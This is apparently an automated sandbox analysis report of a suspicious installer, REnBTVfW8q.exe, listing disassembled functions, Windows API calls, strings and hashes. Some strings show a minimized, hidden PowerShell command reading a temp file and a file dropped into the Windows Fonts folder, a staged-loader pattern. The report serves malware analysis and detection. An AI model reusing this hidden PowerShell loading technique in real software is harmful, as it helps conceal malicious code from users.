Opcode Fuzzy Hash: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
Instruction Fuzzy Hash: 953139703007157BC2206B259D49F673A6CEF45714F15003AFA42FA2D2DE7C992586AD

Function 00406644 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REnBTVfW8q.exe",00403464,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REnBTVfW8q.exe",00403464,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REnBTVfW8q.exe",00403464,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE

Strings

*?|<>/":, xrefs: 00406696
"C:\Users\user\Desktop\REnBTVfW8q.exe", xrefs: 00406644
C:\Users\user\AppData\Local\Temp\, xrefs: 00406645, 0040664A

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\REnBTVfW8q.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2730985631
Opcode ID: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
Instruction ID: 91382b34e261ab6a6b837a41ec70345278d3faa82d58aea2d88f3062b19e38b1
Opcode Fuzzy Hash: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
Instruction Fuzzy Hash: 8C11E61580070295DB302B149C40E7766B8EF587A4F12483FED86B32C0E77E4CD286AD

Function 004043AC Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043C9
GetSysColor.USER32(00000000), ref: 004043E5
SetTextColor.GDI32(?,00000000), ref: 004043F1
SetBkMode.GDI32(?,?), ref: 004043FD
GetSysColor.USER32(?), ref: 00404410
SetBkColor.GDI32(?,?), ref: 00404420
DeleteObject.GDI32(?), ref: 0040443A
CreateBrushIndirect.GDI32(?), ref: 00404444

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction ID: 701ae6dfa2b2a9365c03cf2c9b1b76f0db24f0feb35c46e7544c905291b2d973
Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction Fuzzy Hash: 4B216671500704AFCB219F68DE48B5BBBF8AF81714F04893EED95E22A1D774E944CB54

Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724

Part of subcall function 00405F83: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405F99

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0

Strings

9, xrefs: 00402693

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
Instruction ID: c360ee4afea2d2749c5a2d2d3cba589ababf6fe072d155cbc4f623872b1d9462
Opcode Fuzzy Hash: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
Instruction Fuzzy Hash: 2E51F874D0021AAADF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58

Function 00402E72 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402E8D
GetTickCount.KERNEL32 ref: 00402EAB
wsprintfW.USER32 ref: 00402ED9

Part of subcall function 00405414: lstrlenW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
Part of subcall function 00405414: lstrcatW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00402EEC,00402EEC,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000), ref: 0040546F
Part of subcall function 00405414: SetWindowTextW.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond), ref: 00405481
Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF

CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EFD
ShowWindow.USER32(00000000,00000005), ref: 00402F0B

Part of subcall function 00402E56: MulDiv.KERNEL32(00072439,00000064,0007684E), ref: 00402E6B

Strings

... %d%%, xrefs: 00402ED3

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: b1d83868f06c61a0afcbd0f0ce3e66c9248e0a33da805beecb11655fb503df53
Instruction ID: c2ec4548d439a14d597b05689786213ff5532ac021c242b5895b0761ec4a5705
Opcode Fuzzy Hash: b1d83868f06c61a0afcbd0f0ce3e66c9248e0a33da805beecb11655fb503df53
Instruction Fuzzy Hash: 0501C430440724EBCB31AB60EF4CB9B7B68AB00B44B50417FF945F12E0CAB844558BEE

Function 00404CDE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404CF9
GetMessagePos.USER32 ref: 00404D01
ScreenToClient.USER32(?,?), ref: 00404D1B
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D2D
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D53

Strings

f, xrefs: 00404D2F

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: b067d4b0ecc7c77c1c3f0caef97ada8ed48413e9bef28a1d47140c0a876cf8aa
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: AD015E71A0021DBADB00DB94DD85BFEBBBCAF95715F10412BBA50B62D0C7B899018BA4

Function 00402DD7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
wsprintfW.USER32 ref: 00402E29
SetWindowTextW.USER32(?,?), ref: 00402E39
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E4B

Strings

verifying installer: %d%%, xrefs: 00402E1E
unpacking data: %d%%, xrefs: 00402E17, 00402E27

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
Instruction ID: 0bc749b122006b2f9f6abad3e9991ed6065550717762caf8ffdc158a825a6066
Opcode Fuzzy Hash: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
Instruction Fuzzy Hash: 69F0367154020DABDF206F50DD4ABEA3B69FB00714F00803AFA06B51D0DBFD55598F99

Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
GlobalFree.KERNEL32(?), ref: 00402950
GlobalFree.KERNEL32(00000000), ref: 00402963
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
Instruction ID: c824e8dfb1c84b3956194132b72a9c46ff30f807773af65f81dcebc4e122496d
Opcode Fuzzy Hash: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
Instruction Fuzzy Hash: 6521BFB1800128BBDF216FA5DE49D9E7E79EF09364F10023AF960762E0CB7949418B98

Function 00404BD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
wsprintfW.USER32 ref: 00404C7A
SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D

Strings

(7B, xrefs: 00404C63
%u.%u%s%s, xrefs: 00404C5B

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
Instruction ID: 703546cccce40a16f7c4e0327b319c47dc4604cc2262111db7ea86f65ec4581c
Opcode Fuzzy Hash: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
Instruction Fuzzy Hash: 0911E7736041287BEB00556DAD46EAF329CDB85374F254237FA66F31D1DA79CC2182E8

Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,formagen\Uninstall\frustulose,000000FF,C:\Windows\Fonts\appendicits.bun,00000400,?,?,00000021), ref: 004025E2
lstrlenA.KERNEL32(C:\Windows\Fonts\appendicits.bun,?,?,formagen\Uninstall\frustulose,000000FF,C:\Windows\Fonts\appendicits.bun,00000400,?,?,00000021), ref: 004025ED

Strings

C:\Windows\Fonts\appendicits.bun, xrefs: 004025AD, 004025D4, 004025E8, 00402634
formagen\Uninstall\frustulose, xrefs: 004025DB

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Windows\Fonts\appendicits.bun$formagen\Uninstall\frustulose
API String ID: 3109718747-3392141526
Opcode ID: aba1ff1e73333e557a2c93527f693b72f8c74919a863be0031e895900c4614b2
Instruction ID: 778b7e41730bacb68cbd472b7e3a637cf80abcfea8faeb2db308f16ae4ae4a1c
Opcode Fuzzy Hash: aba1ff1e73333e557a2c93527f693b72f8c74919a863be0031e895900c4614b2
Instruction Fuzzy Hash: 35112E72A00204BBDB146FB18F8D99F76649F55394F20443BF502F61C1DAFC48425B5E

Function 004058E3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405926
GetLastError.KERNEL32 ref: 0040593A
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040594F
GetLastError.KERNEL32 ref: 00405959

Strings

C:\Users\user\Desktop, xrefs: 004058E3

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-1876063424
Opcode ID: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
Instruction ID: c49c088e9ba2396d105a9c54abfe353073567d613583196498a7e7de041cdc41
Opcode Fuzzy Hash: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
Instruction Fuzzy Hash: C8011AB1C10619DADF009FA1C9487EFBFB4EF14354F00403AD545B6291D7789618CFA9

Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D5D
GetClientRect.USER32(00000000,?), ref: 00401D6A
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
DeleteObject.GDI32(00000000), ref: 00401DA8

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: c65051ea41094a3fe05cc1700b09eddc200d0413b9ca288990d93539fb52748e
Instruction ID: a606f7d5b7d9f25f85f3a996f6cf1d54ca927bfb9af82e5c1f6e8eb7e31f2730
Opcode Fuzzy Hash: c65051ea41094a3fe05cc1700b09eddc200d0413b9ca288990d93539fb52748e
Instruction Fuzzy Hash: 88F0FF72604518AFDB01DBE4DF88CEEB7BCEB08341B14047AF641F61A1CA749D518B78

Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1

Strings

!, xrefs: 00401C55

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
